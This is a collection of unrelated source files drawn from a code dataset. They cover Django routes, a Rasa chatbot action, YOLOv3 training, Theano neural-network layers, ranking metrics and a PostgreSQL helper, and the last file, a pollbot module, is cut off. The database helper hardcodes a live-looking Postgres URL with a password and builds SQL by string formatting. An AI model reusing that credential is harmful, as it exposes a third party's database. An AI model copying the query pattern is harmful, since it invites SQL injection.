url\nfrom django.contrib import admin\nfrom core.forms import TypeForm, RegionForm, DistinctForm, CityForm, PlaceForm, OwnerForm, MarchentForm, ContainerForm\nfrom core.models import Container, Region, Distinct, City, Place, Owner, Marchent, Type\n\nurlpatterns = patterns('',\n                       # Examples:\n                       url(r'^$', 'app.dictionary.get_list', {'model': Container, 'template': 'containers.html'}),\n\n                       url(r'^login$', 'app.views.login_form'),\n                       url(r'^register', 'app.views.register'),\n                       url(r'^logout', 'app.views.log_out'),\n\n                       url(r'^dictionary/regions', 'app.dictionary.get_list',\n                           {'model': Region, 'template': 'regions.html'}),\n\n                       url(r'^dictionary/distincts', 'app.dictionary.get_list',\n                           {'model': Distinct, 'template': 'disctincts.html'}),\n\n                       url(r'^dictionary/cities', 'app.dictionary.get_list',\n                           {'model': City, 'template': 'cities.html'}),\n\n                       url(r'^dictionary/places', 'app.dictionary.get_list',\n                           {'model': Place, 'template': 'places.html'}),\n\n                       url(r'^dictionary/owners', 'app.dictionary.get_list',\n                           {'model': Owner, 'template': 'owners.html'}),\n\n                       url(r'^dictionary/marchents', 'app.dictionary.get_list',\n                           {'model': Marchent, 'template': 'marchents.html'}),\n\n                       url(r'^dictionary/types', 'app.dictionary.get_list', {'model': Type, 'template': 'types.html'}),\n\n                       url(r'^dictionary/type', 'app.dictionary.get_form',\n                           {'model': Type, 'name': 'Новий тип', 'model_form': TypeForm, 'back': 'types',\n                            'now': 'type'}),\n\n                       
url(r'^dictionary/region', 'app.dictionary.get_form',\n {'model': Region, 'name': 'Нова область', 'model_form': RegionForm, 'back': 'regions',\n 'now': 'region'}),\n\n url(r'^dictionary/distinct', 'app.dictionary.get_form',\n {'model': Distinct, 'name': 'Новий район', 'model_form': DistinctForm, 'back': 'distincts',\n 'now': 'distinct'}),\n\n url(r'^dictionary/city', 'app.dictionary.get_form',\n {'model': City, 'name': 'Нове місто', 'model_form': CityForm, 'back': 'cities',\n 'now': 'city'}),\n\n url(r'^dictionary/place', 'app.dictionary.get_form',\n {'model': Place, 'name': 'Нове місце', 'model_form': PlaceForm, 'back': 'places',\n 'now': 'place'}),\n\n url(r'^dictionary/owner', 'app.dictionary.get_form',\n {'model': Owner, 'name': 'Новий власник', 'model_form': OwnerForm, 'back': 'owners',\n 'now': 'owner'}),\n\n url(r'^dictionary/marchent', 'app.dictionary.get_form',\n {'model': Marchent, 'name': 'Новий орендар', 'model_form': MarchentForm, 'back': 'marchents',\n 'now': 'marchent'}),\n\n url(r'^dictionary/container', 'app.dictionary.get_form',\n {'model': Container, 'name': 'Новий контейнер', 'model_form': ContainerForm, 'back': '../',\n 'now': 'container'}),\n\n url(r'^export/(?P\\w+)', 'app.dictionary.export'),\n url(r'^info/owner/(?P\\d+)', 'app.dictionary.info', {'model': Owner}),\n url(r'^info/marchent/(?P\\d+)', 'app.dictionary.info', {'model': Marchent}),\n\n url(r'^filter$', 'app.dictionary.filter'),\n\n url(r'^admin/', include(admin.site.urls)),\n )\n","sub_path":"Kursova/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325138033","text":"from rasa_core_sdk import Action\r\nfrom rasa_core_sdk.events import SlotSet\r\nfrom rasa_core_sdk.events import UserUtteranceReverted\r\nfrom snlu_api import snlu_api\r\nfrom request import request_nlu\r\nimport json\r\nfrom rasa_core.trackers import DialogueStateTracker\r\nimport rasa_core.events\r\nfrom rasa_core.conversation import Dialogue\r\n\r\ndef get_entity_value():\r\n lines = open('entity_mapping.txt', 'r')\r\n entities = {}\r\n for line in lines:\r\n data = line.replace('\\n',\"\").split(',')\r\n entities[data[0]] = data[1]\r\n return entities\r\n\r\ndef parse_nlu_output(data):\r\n spacy = False\r\n if data['intent']['name'] == 'inform' and len(data['entities']) > 0 :\r\n for entity in data['entities'] :\r\n if entity['extractor'] == 'ner_spacy' :\r\n spacy = True\r\n spacy_value = entity['value']\r\n elif entity['extractor'] == 'ner_crf' :\r\n crf_value = entity['value']\r\n crf_confidence = entity['confidence']\r\n\r\n if spacy :\r\n return [ spacy_value, 0.0 ]\r\n else: \r\n return [ crf_value, crf_confidence ]\r\n \r\n else:\r\n\t return [\"error. 
data not recognized\", 0.0]\r\n\r\n\r\nclass ActionSNLU(Action):\r\n def name(self):\r\n return \"ActionSNLU\"\r\n \r\n def run(self, dispatcher, tracker, domain):\r\n #get the latest user utterance and pass it\r\n #with the tracker for the Special NLU processing\r\n #print('invoked ActionSNLU')\r\n user_message = tracker.latest_message.get('text')\r\n #print('user message is ', user_message)\r\n \"\"\" for event in tracker.events:\r\n print(event.keys())\r\n print(event.get('event'))\r\n try:\r\n print(event.get('name'))\r\n except:\r\n print(event.get('text')) \"\"\"\r\n nlu_output, utter_action = snlu_api(user_message, tracker)\r\n print(nlu_output)\r\n #get a dictionary of questions (utter_action) and answers (entity in the output)\r\n entities = get_entity_value()\r\n slot = entities[utter_action]\r\n ##now parse nlu_output to find out the entity\r\n entity_value, entity_confidence = parse_nlu_output(nlu_output)\r\n return [SlotSet(slot, entity_value)]\r\n\r\n","sub_path":"actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461813745","text":"#!/usr/local/bin/python\n# coding: utf-8\n\nfrom django.contrib import admin\n# from django.utils.translation import ugettext_lazy as _\n\nfrom .models import Mensaje\n\n\nclass MensajeAdmin(admin.ModelAdmin):\n list_display = (\n 'id_str',\n 'directo',\n 'screen_name',\n 'name',\n 'lat',\n 'lon',\n 'text'\n )\n list_filter = ('directo', 'located', 'atendido_por', 'abuso')\n\n search_fields = ('screen_name',)\n ordering = ('id_int',)\n\nadmin.site.register(Mensaje, MensajeAdmin)\n","sub_path":"alertas123/cliente/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"126307229","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 25 21:58:22 2018\n\n@author: Александр\n71\"\"\"\nfrom .planList import PlanList\n\nplanList = PlanList()\nMENU = [\n [\"Добавить основной учебный план\", planList.addBasePlan],\n [\"Добавить расширенный учебный план\", planList.addExtendedPlan],\n [\"Вывести весь список на экран\", planList.printElements],\n [\"Очистить список\", planList.eraseElements],\n [\"Вывести список в файл\", planList.printToFile],\n [\"Загрузить список из файла\", planList.downloadElementsFromFile],\n [\"Редактировать план\", planList.editPlan]\n\t]\n\n\ndef menu():\n\tprint(\"------------------------------\")\n\tfor i, item in enumerate(MENU):\n\t\tprint(\"{0:2}. {1}\".format(i+1, item[0]))\n\tprint(\"------------------------------\")\n\treturn int(input())\n\n \ndef main():\n try:\n \twhile True:\n \t\tMENU[menu()-1][1]()\n except Exception as ex:\n \tprint(ex, \"\\nbye\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"st39/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"335788948","text":"import argparse\n\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtCore, QtGui\n\nfrom . 
import get_scope_window\nfrom ..utils.display_exception import activate_error_dialog\n\n\ndef create_parser(parser=None):\n if parser is None:\n parser = argparse.ArgumentParser(description='Programme pour visualiser un scope')\n parser.add_argument('--test', action='store_true', help='Use to test unconnected instrument')\n parser.add_argument('--plot_engine', default='pyqtgraph', help='Engine to do the plots', choices=['mpl', 'pyqtgraph'])\n return parser\n\ndef main(args=None):\n if not isinstance(args, argparse.Namespace):\n parser = create_parser()\n args = parser.parse_args(args)\n \n if args.test:\n from ..instrument.scope.test import test_detection\n from ..instrument.gbf.test import test_detection\n activate_error_dialog()\n app = QtGui.QApplication([])\n win = get_scope_window(args.plot_engine)\n win.show()\n app.exec_()\n\n\nif __name__=='__main__':\n main()\n","sub_path":"tpmontrouge/tpmontrouge/interface/scope/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"7895555","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 27 16:04:42 2018\n\n@author: ASUS\n\"\"\"\n\nimport os\nfrom urllib import parse\nimport psycopg2 as ps\nimport pandas as pd\nimport datetime\nimport random\nimport string\n\ndef connectToDatabase():\n url='postgres://nrarbplrmncopz:83c8824b40049266f138346faf865fb3dfa9055b05a6cab130cf7a295cd40198@ec2-54-83-204-6.compute-1.amazonaws.com:5432/d43d4knqc74pv2'\n\n os.environ['DATABASE_URL'] = url\n \n parse.uses_netloc.append('postgres')\n url=parse.urlparse(os.environ['DATABASE_URL'])\n \n conn=ps.connect(\n database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n \n cur=conn.cursor()\n \n return cur, conn\n\ndef runquery(query):\n cur, conn=connectToDatabase()\n result=None\n try:\n cur.execute(query)\n result=list(cur)\n except:\n result=['error']\n \n cur.close()\n conn.commit()\n return result\n\ndef idgenerator():\n result=''.join([random.choice(string.ascii_letters + string.digits) for n in range(16)])\n return result\n\ndef addWorkerLine(calltype):\n timestart=datetime.datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\")\n wid=idgenerator()\n query=\"INSERT INTO worker (wid, calltype, reply, starttime) VALUES('%s', '%s', '%s', '%s')\" %(wid,calltype,\"generating\", timestart)\n result=runquery(query)\n return wid\n \ndef updateWorkerLine(wid, reply):\n endtime=datetime.datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\")\n query=\"UPDATE worker SET reply='%s', endtime='%s' WHERE wid='%s'\" %(reply, endtime, wid)\n result=runquery(query)\n return result\n\ndef getAccounts():\n query=\"SELECT seller_id, acct_name FROM accts\"\n result=runquery(query)\n ret={}\n i=0\n for line in result:\n ls={\n \"seller_id\":line[0],\n \"acct_name\":line[1]\n }\n ret[str(i)]=ls\n i+=1\n \n return ret\n\ndef getAccountDetails():\n df=pd.DataFrame(columns=['acct_name', 'seller_id', 'ims_api_key', 'tms_api_key'])\n query=\"SELECT * FROM accts\"\n result=runquery(query)\n for line in result:\n ls=list(line)\n df.loc[str(len(df))]=ls\n \n return df\n\n","sub_path":"dbconnector.py","file_name":"dbconnector.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275809380","text":"import os\r\nimport time\r\nimport torch\r\nimport argparse\r\nimport warnings\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport 
torch.optim as optim\r\nfrom termcolor import colored\r\nfrom pyemojify import emojify\r\nfrom tqdm import tqdm, trange\r\nfrom tensorboardX import SummaryWriter\r\nfrom torchvision import transforms, utils\r\nimport torch.optim.lr_scheduler as lr_scheduler\r\nopj = os.path.join\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nimport config\r\nfrom model import YOLOv3\r\nfrom dataset import prepare_train_dataset, prepare_val_dataset\r\nfrom utils import get_current_time, draw_detection, save_checkpoint, load_checkpoint, mAP, log\r\n\r\n\r\ndef parse_arg():\r\n parser = argparse.ArgumentParser(description='YOLO v3 training')\r\n parser.add_argument('--reso', default=416, type=int, help=\"Input image resolution\")\r\n parser.add_argument('--lr', default=1e-3, type=float, help=\"Learning rate\")\r\n parser.add_argument('--batch', default=16, type=int, help=\"Batch size\")\r\n parser.add_argument('--dataset', default='coco', choices=['tejani', 'coco'], type=str, help=\"Dataset name\")\r\n parser.add_argument('--checkpoint', default='0.0', type=str, help=\"Checkpoint name in format: `epoch.iteration`\")\r\n parser.add_argument('--gpu', default='0', type=str, help=\"GPU id\")\r\n return parser.parse_args()\r\n\r\n\r\nargs = parse_arg()\r\ncfg = config.network[args.dataset]['cfg']\r\nlog_dir = opj(config.LOG_ROOT, get_current_time())\r\nwriter = SummaryWriter(log_dir=log_dir)\r\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\r\n\r\n\r\ndef train(epoch, trainloader, yolo, optimizer):\r\n \"\"\"Training wrapper\r\n\r\n @Args\r\n epoch: (int) training epoch\r\n trainloader: (Dataloader) train data loader \r\n yolo: (nn.Module) YOLOv3 model\r\n optimizer: (optim) optimizer\r\n \"\"\"\r\n yolo.train()\r\n tbar = tqdm(trainloader, ncols=80)\r\n tbar.set_description('training')\r\n for batch_idx, (names, inputs, targets) in enumerate(tbar):\r\n global_step = batch_idx + epoch * len(trainloader)\r\n \r\n # SGD burn in\r\n if (epoch == 0) & (batch_idx <= 1000):\r\n lr = optimizer.param_groups[0]['lr'] * (batch_idx / 1000) ** 4\r\n for g in optimizer.param_groups:\r\n g['lr'] = lr\r\n\r\n optimizer.zero_grad()\r\n inputs = inputs.cuda()\r\n yolo(inputs, targets)\r\n log(writer, 'train_loss', yolo.loss, global_step)\r\n yolo.loss['total'].backward()\r\n optimizer.step()\r\n\r\n # save something every 1500 iterations\r\n if (global_step + 1) % 1500 == 0:\r\n save_checkpoint(opj(config.CKPT_ROOT, args.dataset), epoch, batch_idx + 1, {\r\n 'epoch': epoch,\r\n 'iteration': batch_idx + 1,\r\n 'state_dict': yolo.state_dict()\r\n })\r\n\r\n\r\ndef val(valloader, yolo):\r\n \"\"\"Validation wrapper\r\n\r\n @Args\r\n valloader: (Dataloader) validation data loader \r\n yolo: (nn.Module) YOLOv3 model\r\n \"\"\"\r\n yolo.eval()\r\n mAPs = []\r\n tbar = tqdm(valloader, ncols=80)\r\n tbar.set_description('validation')\r\n for batch_idx, (names, inputs, targets) in enumerate(tbar):\r\n inputs = inputs.cuda()\r\n start_time = time.time()\r\n detections = yolo(inputs)\r\n forward_time = time.time()\r\n loss, cache = yolo.loss(targets)\r\n mAP_batch = mAP(detections, targets, args.reso)\r\n mAPs += mAP_batch\r\n tbar.set_description(\"mAP=%.2f\" % (np.mean(mAPs) * 100))\r\n\r\n return loss['total'], np.mean(mAPs)\r\n\r\n\r\nif __name__ == '__main__':\r\n # 1. 
Parsing arguments\r\n    print(colored(\"\\n==>\", 'blue'), emojify(\"Parsing arguments :zap:\\n\"))\r\n    assert args.reso % 32 == 0, emojify(\"Resolution must be an integer multiple of 32 :shit:\")\r\n    for arg in vars(args):\r\n        print(arg, ':', getattr(args, arg))\r\n    print(\"log_dir :\", log_dir)\r\n\r\n    # 2. Loading network\r\n    # TODO: resume tensorboard\r\n    print(colored(\"\\n==>\", 'blue'), emojify(\"Loading network :hourglass:\\n\"))\r\n    yolo = YOLOv3(cfg, args.reso).cuda()\r\n    start_epoch, start_iteration = args.checkpoint.split('.')\r\n    start_epoch, start_iteration, state_dict = load_checkpoint(\r\n        opj(config.CKPT_ROOT, args.dataset),\r\n        int(start_epoch),\r\n        int(start_iteration)\r\n    )\r\n    yolo.load_state_dict(state_dict)\r\n    print(\"Model starts training from epoch %d iteration %d\" % (start_epoch, start_iteration))\r\n\r\n    # 3. Preparing data\r\n    print(colored(\"\\n==>\", 'blue'), emojify(\"Preparing data :coffee:\\n\"))\r\n    train_img_datasets, train_dataloader = prepare_train_dataset(args.dataset, args.reso, args.batch)\r\n    val_img_datasets, val_dataloader = prepare_val_dataset(args.dataset, args.reso, args.batch)\r\n    print(\"Number of training images:\", len(train_img_datasets))\r\n    print(\"Number of validation images:\", len(val_img_datasets))\r\n\r\n    # 4. Training\r\n    print(colored(\"\\n==>\", 'blue'), emojify(\"Training :snowflake:\\n\"))\r\n    optimizer = optim.SGD(filter(lambda p: p.requires_grad, yolo.parameters()),\r\n                          lr=args.lr, momentum=0.9, weight_decay=5e-4, nesterov=True)\r\n    for epoch in range(start_epoch, start_epoch+20):\r\n        print(\"[EPOCH] %d, learning rate = %.5f\" % (epoch, optimizer.param_groups[0]['lr']))\r\n        train(epoch, train_dataloader, yolo, optimizer)\r\n        # with torch.no_grad():\r\n        #     val_loss, val_mAP = val(val_dataloader, yolo)\r\n        #     scheduler.step(val_mAP)\r\n        #     log(writer, 'val_loss', val_loss, epoch)\r\n        #     log(writer, 'val_mAP', val_mAP, epoch)\r\n        #     print(\"Validation mAP =\", val_mAP)\r\n        #     if val_mAP >= best_mAP:\r\n        #         best_mAP = val_mAP\r\n        #         save_checkpoint(opj(config.CKPT_ROOT, args.dataset), epoch, len(train_dataloader), {\r\n        #             'epoch': epoch,\r\n        #             'iteration': len(train_dataloader),\r\n        #             'state_dict': yolo.state_dict()\r\n        #         })\r\n","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"53360267","text":"import theano.tensor as T\nimport theano\n\n\ndef affine_layer(x, w, b):\n    \"\"\"\n    Input:\n        x: the input of the affine layer with shape(N, c1, c2...), where we compute over N minibatch size and\n            the input has c1, c2... dimensions.\n        w: the weight, which has shape(c1*c2*...., M), where M is the dimension of the next hidden layer\n        b: the bias, which has shape(M, )\n    return: the symbolic computation of the affine layer\n    \"\"\"\n    return x.flatten(ndim=2).dot(w) + b\n\n\n
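# Shape note (illustrative): for x of shape (N, 3, 4), w must have shape (12, M);\n# flatten(ndim=2) collapses x to (N, 12) before the dot product with w.\n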
def relu_layer(x):\n    \"\"\"\n    :param x: the input of any shape\n    :return: the symbolic computation after the relu non-linear activation function.\n    \"\"\"\n    return (x + T.abs_(x)) / 2\n\n\ndef batch_norm_layer(x, gamma, beta, mode, full_data):\n    \"\"\"\n    This implementation uses the standard deviation and mean over the whole training set for the test mode,\n    so we behave differently in train mode and test mode.\n    :param x: a tensor of input, which has shape(N, D)-> for affine layer or (N, C, H, W)-> for conv layer\n    :param gamma: a tensor variable of scale parameter of shape(D, ) or (C, )\n    :param beta: a tensor variable of shift parameter of shape(D, ) or (C, )\n    :param full_data: the full training set, used to compute the test-time statistics\n    :return: out: computation represents the normalized computation\n    \"\"\"\n    axes = (0,) + tuple(range(2, x.ndim))\n    pattern = [\"x\" if i != 1 else 0 for i in range(0, x.ndim)]\n    gamma = gamma.dimshuffle(pattern)\n    beta = beta.dimshuffle(pattern)\n    if mode == 'train':\n        mean = T.mean(x, axis=axes).dimshuffle(pattern)\n        std = T.std(x, axis=axes).dimshuffle(pattern)\n    elif mode == 'test':\n        # use statistics over the full training data, as described in the docstring\n        mean = T.mean(full_data, axis=axes).dimshuffle(pattern)\n        std = T.std(full_data, axis=axes).dimshuffle(pattern)\n    else:\n        raise ValueError(mode, \"is not a valid mode\")\n    out = T.nnet.batch_normalization(x, gamma, beta, mean, std)\n    return out\n\n\ndef bn(x, gamma, beta, mode='train'):\n    \"\"\"\n    A running mean and running std implementation. For every training step, we update the running mean\n    and running std based on this formula:\n        running_mean: momentum*running_mean + (1-momentum)*sample_mean\n        running_std: momentum*running_std + (1-momentum)*sample_std\n    :param x: input data\n    :param gamma: same as batch_norm\n    :param beta: same as batch_norm\n    :param mode: 'test' or 'train'\n    :return: out\n    \"\"\"\n\n\ndef dropout_layer(x, p, mode):\n    \"\"\"\n    :param x: a tensor variable of mini-batch.\n    :param p: the probability that each neuron is kept (inverted dropout)\n    :param mode: training or testing\n    :return: out: a tensor computation graph represents x after drop out\n    \"\"\"\n    dtype = x.dtype\n    if mode == 'train':\n        srng = T.shared_randomstreams.RandomStreams()\n        mask = srng.binomial(size=x.shape, p=p)/p\n        mask = T.cast(mask, dtype)\n        out = x * mask\n    elif mode == 'test':\n        out = x\n    else:\n        raise ValueError(mode, 'is not a mode')\n    return out\n\n\ndef conv_layer(x, kernel, bias, stride=None, pad=None, kernel_size=None, keep_size=True):\n    \"\"\"\n\n    :param x: same as x in conv2d\n    :param kernel: same as filter in conv2d\n    :param stride: same as subsample in conv2d\n    :param keep_size: if true, then we will use stride=(1, 1) and padding=(F-1)/2 to keep dimension\n        if false, we will use the information given above.\n    :param pad:\n    :param kernel_size:\n    :return: out, computation graph represents the convolved x\n    \"\"\"\n\n    if keep_size:\n        assert isinstance(kernel_size, int), \"kernel_size needs to be passed\"\n        pad = (kernel_size-1)//2\n        stride = (1, 1)\n    else:\n        assert isinstance(stride, (tuple, list)) and isinstance(pad, int), \\\n            \"If keep_size is False, you must pass pad and stride parameters!\"\n    out = T.nnet.conv2d(input=x, filters=kernel, subsample=stride, border_mode=pad)\n    bias = bias.dimshuffle('x', 0, 'x', 'x')\n    out += bias\n    return out\n\n\n
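# Padding note (illustrative): with keep_size=True and kernel_size=3, pad=(3-1)//2=1\n# and stride (1, 1), so an (N, C, H, W) input keeps its H and W after the convolution.\n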
def lstm_step(x, prev_hidden, prev_cell, Wx, Wh, b):\n    \"\"\"\n    The computation of the cell state is as follows:\n        cell = forget_gate * prev_cell + (input_gate*block_input)\n        hidden state = output_gate * tanh(cell)\n    :param x: input data of shape(N, D), where N is the number of mini-batches, D is the dimension of input data\n    :param prev_hidden: previous hidden state of shape(N, H), where N is the size of mini-batches,\n        H is the dim of the hidden dimension\n    :param prev_cell: previous cell state of shape(N, H)\n    :param Wx: weight theano shared variable for the lstm, has shape(D, 4H)\n        4*H are composed of [:H]->input_gate\n                            [H:2H]->forget_gate\n                            [2H:3H]->output_gate\n                            [3H:4H]->block_input\n    :param Wh: shape of (H, 4H), same as Wx\n    :param b: bias theano shared variable with shape(4H)\n    :return: the computation representation of a single LSTM step\n    \"\"\"\n    H = prev_hidden.shape[1]\n    # compute the entire activation. shape(N, 4H)\n    a = T.dot(x, Wx) + T.dot(prev_hidden, Wh) + b\n\n    # get input gate, forget gate, output gate and block input\n    i = T.nnet.sigmoid(a[:, :H])\n    f = T.nnet.sigmoid(a[:, H:2*H])\n    o = T.nnet.sigmoid(a[:, 2*H:3*H])\n    g = T.tanh(a[:, 3*H:4*H])\n\n    # compute next cell state and next hidden state\n    cell = prev_cell * f + (i*g)\n    hidden = o*T.tanh(cell)\n\n    return hidden, cell\n\n\ndef word_embedding(x, W):\n    \"\"\"\n    :param x: input tensor variable of shape(N, T), where N is the mini-batch size and\n        x[n, t] is the index of the word at timestep t.\n    :param W: Word embedding matrix, to be learnt along with other model parameters.\n        It has shape(V, D), where V is the total vocab size and D is the dimension of each word vector\n    :return: out: tensor variable shape of (N, T, D). out[0, 0, :] is the word vector of sample 0 at time 0\n    \"\"\"\n    return W[x]\n\ndef RSS(y, true_y, mask=None):\n    \"\"\"\n    An implementation of the residual sum of squares loss.\n    :param y: N, D\n    :param true_y: N, D\n    :return: loss: a length-N vector with the error for each example\n    \"\"\"\n    if mask is None:\n        mask = T.ones(y.shape)\n    y *= mask\n    loss = T.sqr(y-true_y)\n    loss = T.sum(loss, axis=1)\n    return loss\n\ndef RMSE(y, true_y):\n    \"\"\"\n    Root Mean Squared Error\n    error = sqrt(mean((y-true_y)**2))\n    :param y:\n    :param true_y:\n    :return:\n    \"\"\"\n    loss = y-true_y\n    loss = T.sqr(loss)\n    loss = T.mean(loss, axis=1)\n    loss = T.sqrt(loss)\n    return loss\n","sub_path":"layer_utilities/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143040048","text":"'''\nEvaluation metrics functions.\n'''\n# import math\nimport numpy as np\nimport collections\n\n# from sklearn.metrics import roc_auc_score\n# from sklearn.metrics import roc_curve, auc\n# from sklearn.metrics import average_precision_score\nfrom sklearn.preprocessing import label_binarize\nfrom scipy.stats import rankdata\nfrom scipy import stats\n\n\ndef _retype(y_prob, y):\n    if not isinstance(y, (collections.Sequence, np.ndarray)):\n        y_prob = [y_prob]\n        y = [y]\n    y_prob = np.array(y_prob)\n    y = np.array(y)\n\n    return y_prob, y\n\n# def _retype_hate(y_hate):\n#     if not isinstance(y_hate, (collections.Sequence, np.ndarray)):\n#         y_hate = [y_hate]\n#     y_hate = np.array(y_hate)\n#     return y_hate\n    \ndef _binarize(y, n_classes=None):\n    return label_binarize(y, classes=range(n_classes))\n\n\ndef apk(actual, predicted, k=10):\n    \"\"\"\n    Computes the average precision at k.\n    This function computes the average precision at k between two lists of\n    items.\n    Parameters\n    ----------\n    actual : list\n        A list of elements that are to be predicted (order doesn't matter)\n    predicted : list\n        A list of predicted elements (order does matter)\n    k : int, optional\n        The maximum number of predicted elements\n    Returns\n    -------\n    score : double\n        The average precision at k over the input lists\n    \"\"\"\n    if len(predicted) > k:\n        predicted = predicted[:k]\n\n    score = 0.0\n    num_hits = 0.0\n\n    for i, p in enumerate(predicted):\n        if p in actual and p not in predicted[:i]:\n            num_hits += 1.0\n            score += num_hits / (i + 1.0)\n\n    if not actual:\n        return 0.0\n\n    return score / min(len(actual), k)\n\n\n
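# Worked example (illustrative): apk(actual=[1, 3], predicted=[1, 2, 3], k=3) hits\n# at ranks 1 and 3, giving (1/1 + 2/3) / 2 = 0.833...\n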
def mapk(y_prob, y, k=10):\n    \"\"\"\n    Computes the mean average precision at k.\n    This function computes the mean average precision at k between two lists\n    of lists of items.\n    Parameters\n    ----------\n    actual : list\n        A list of lists of elements that are to be predicted\n        (order doesn't matter in the lists)\n    predicted : list\n        A list of lists of predicted elements\n        (order matters in the lists)\n    k : int, optional\n        The maximum number of predicted elements\n    Returns\n    -------\n    score : double\n        The mean average precision at k over the input lists\n    \"\"\"\n    predicted = [np.argsort(p_)[-k:][::-1] for p_ in y_prob]\n    actual = [[y_] for y_ in y]\n    return np.mean([apk(a, p, k) for a, p in zip(actual, predicted)])\n\n\ndef mean_rank(y_prob, y):\n    ranks = []\n    n_classes = y_prob.shape[1]\n    for p_, y_ in zip(y_prob, y):\n        ranks += [n_classes - rankdata(p_, method='max')[y_]]\n\n    return sum(ranks) / float(len(ranks))\n\n\ndef hits_k(y_prob, y, k=10):\n    acc = []\n    for p_, y_ in zip(y_prob, y):\n        top_k = p_.argsort()[-k:][::-1]\n        acc += [1. if y_ in top_k else 0.]\n    return sum(acc) / len(acc)\n\ndef _apk(actual, pred,k):\n    predicted = np.argsort(pred)[-k:][::-1]\n    score = 0.0\n    num_hits = 0.0\n    for i, p in enumerate(predicted):\n        if p in actual:\n            num_hits += 1.0\n            score += num_hits / (i + 1.0)\n    return score / min(len(actual), k)\n\ndef _hits(actual, predicted, k=20):\n    predicted = np.argsort(predicted)[-k:][::-1]\n    aucc = 0\n    for i in predicted:\n        if i in actual:\n            aucc+=1\n    return aucc/ min(len(actual), k)\n\n\n# def roc_auc(y_prob, y):\n#     y = _binarize(y, n_classes=y_prob.shape[1])\n#     fpr, tpr, _ = roc_curve(y.ravel(), y_prob.ravel())\n#     return auc(fpr, tpr)\n\n# def log_prob(y_prob, y):\n#     scores = []\n#     for p_, y_ in zip(y_prob, y):\n#         assert abs(np.sum(p_) - 1) < 1e-8\n#         scores += [-math.log(p_[y_]) + 1e-8]\n#         print p_, y_\n\n#     return sum(scores) / len(scores)\ndef _flatten_y(y_ori, y_len):\n    y_flat = []\n    for i in range(y_len):\n        if i==y_ori:\n            y_flat.append(1)\n        else:\n            y_flat.append(0)\n    y_flat = np.array(y_flat)\n    return y_flat\n\ndef portfolio(y_prob, y, y_hate=None, k_list=[10, 50, 100], test_batch=False):\n    y_prob, y = _retype(y_prob, y)\n    # scores = {'auc': roc_auc(y_prob, y)}\n    # scores = {'mean-rank:': mean_rank(y_prob, y)}\n    scores = {}\n    for k in k_list:\n        scores['hits@' + str(k)] = hits_k(y_prob, y, k=k)\n        scores['map@' + str(k)] = mapk(y_prob, y, k=k)\n    if test_batch:\n        num_test, y_len = y_prob.shape\n        print(num_test, y_len)\n        tau_h = 0.0\n        row_h = 0.0\n        hit_h = 0.0\n        map_h = 0.0\n        tau_nh = 0.0\n        row_nh = 0.0\n        hit_nh = 0.0\n        map_nh = 0.0\n        c_h = 0\n        c_nh = 0\n        tau =0.0\n        row = 0.0\n        for i in range(num_test):\n            y_flat = _flatten_y(y[i],y_len)\n            tau += stats.kendalltau(y_prob[i],y_flat)[0]\n            row += stats.spearmanr(y_prob[i],y_flat)[0]\n            if y_hate[i]:\n                tau_h += stats.kendalltau(y_prob[i],y_flat)[0]\n                row_h += stats.spearmanr(y_prob[i],y_flat)[0]\n                map_h += _apk(set([y[i]]),y_prob[i],k=20)\n                hit_h 
+= _hits(set([y[i]]),y_prob[i],k=20)\n                c_h += 1\n            else:\n                tau_nh += stats.kendalltau(y_prob[i],y_flat)[0]\n                row_nh += stats.spearmanr(y_prob[i],y_flat)[0]\n                map_nh += _apk(set([y[i]]),y_prob[i],k=20)\n                hit_nh += _hits(set([y[i]]),y_prob[i],k=20)\n                c_nh += 1\n        \n        assert c_h+c_nh==num_test\n        scores['tau']=tau/num_test\n        scores['row']=row/num_test\n        scores['hate_tau'] = tau_h/c_h\n        scores['hate_row'] = row_h/c_h\n        scores['HATE_hits@20'] = hit_h/c_h\n        scores['HATE_map@20'] = map_h/c_h\n        scores['non_hate_tau'] = tau_nh/c_nh\n        scores['non_hate_row'] = row_nh/c_nh\n        scores['NON_HATE_hits@20'] = hit_nh/c_nh\n        scores['NON_HATE_map@20'] = map_nh/c_nh\n    return scores","sub_path":"code/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"221519306","text":"\"\"\"Handle messages.\"\"\"\nfrom sqlalchemy import func\nfrom sqlalchemy.orm import joinedload\nfrom datetime import datetime, timedelta\nfrom telegram.error import BadRequest, Unauthorized\n\nfrom pollbot.i18n import i18n\nfrom pollbot.models import Update, Notification, Poll\nfrom pollbot.helper.session import job_session_wrapper\nfrom pollbot.helper.update import send_updates, window_size, 